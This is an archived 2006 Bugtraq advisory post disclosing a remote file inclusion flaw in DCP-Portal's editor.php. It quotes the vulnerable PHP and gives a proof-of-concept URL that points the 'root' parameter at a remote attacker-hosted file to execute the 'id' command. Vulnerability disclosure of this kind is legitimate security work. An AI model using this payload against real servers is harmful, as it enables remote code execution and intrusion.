Bugtraq mailing list archives
[Kurdish Security # 8] DCP-Portal Remote File Include Vulnerability [Editor DHTML]
From: botan () linuxmail org
Date: 13 Jun 2006 08:30:35 -0000
# Kurdish Security Advisory # irc.gigachat.net #kurdhack # http://www.milw0rm.com/exploits/1905 # Editor DHTML Scripting bugz $url_path_editor = "$root_url/library/editor/"; $abs_path_editor = "$root/library/editor/"; ?> Proof Of Concept http://www.site.com/[dcpath]/library/editor/editor.php?root=http://www.yourscripts.com/x.txt?cmd=id
Current thread:
- [Kurdish Security # 8] DCP-Portal Remote File Include Vulnerability [Editor DHTML] botan (Jun 17)